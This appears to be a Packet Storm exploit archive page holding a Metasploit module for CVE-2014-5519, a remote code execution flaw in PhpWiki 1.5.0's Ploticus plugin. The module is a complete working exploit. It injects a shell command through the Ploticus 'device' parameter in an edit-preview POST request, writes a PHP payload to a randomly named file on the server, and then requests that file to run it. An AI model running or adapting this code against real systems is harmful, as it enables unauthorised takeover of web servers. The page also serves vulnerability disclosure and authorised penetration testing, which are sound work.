what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Phpwiki Ploticus Remote Code Execution

Phpwiki Ploticus Remote Code Execution
Posted Sep 16, 2014
Authored by Benjamin Harris | Site metasploit.com

The Ploticus module in PhpWiki 1.5.0 allows remote attackers to execute arbitrary code via command injection.

tags | exploit, remote, arbitrary
advisories | CVE-2014-5519
SHA-256 | 18e48e1283c1f7e2061ea8e462d3f9d53674f70eece48f0ad2d5d50a28673365

Phpwiki Ploticus Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE

def initialize(info = {})
super(update_info(info,
'Name' => 'Phpwiki Ploticus Remote Code Execution',
'Description' => %q{
The Ploticus module in PhpWiki 1.5.0 allows remote attackers to execute arbitrary
code via command injection.
},
'Author' =>
[
'Benjamin Harris', # Discovery and POC
'us3r777 <us3r777[at]n0b0.so>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-5519' ],
[ 'OSVDB', '110576' ],
[ 'EDB', '34451'],
[ 'URL', 'https://sourceforge.net/p/phpwiki/code/8974/?page=1' ], # This commit prevents exploitation
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Aug/77' ] # The day the vuln went public
],
'Payload' =>
{
'BadChars' => "\x00",
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 11 2014'))

register_options(
[
OptString.new('TARGETURI', [true, 'The full URI path to phpwiki', '/phpwiki']) ,
], self.class)
end

def exploit
uri = target_uri.path

payload_name = "#{rand_text_alpha(8)}.php"
php_payload = get_write_exec_payload(:unlink_self=>true)

res = send_request_cgi({
'uri' => normalize_uri(uri + '/index.php/HeIp'),
'method' => 'POST',
'vars_post' =>
{
'pagename' => 'HeIp',
'edit[content]' => "<<Ploticus device=\";echo '#{php_payload}' > #{payload_name};\" -prefab= -csmap= data= alt= help= >>",
'edit[preview]' => 'Preview',
'action' => 'edit'
}
})

if not res or res.code != 200
fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
end

upload_uri = normalize_uri(uri + "/" + payload_name)
print_status("#{peer} - Executing payload #{payload_name}")
send_request_raw({
'uri' => upload_uri,
'method' => 'GET'
})
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close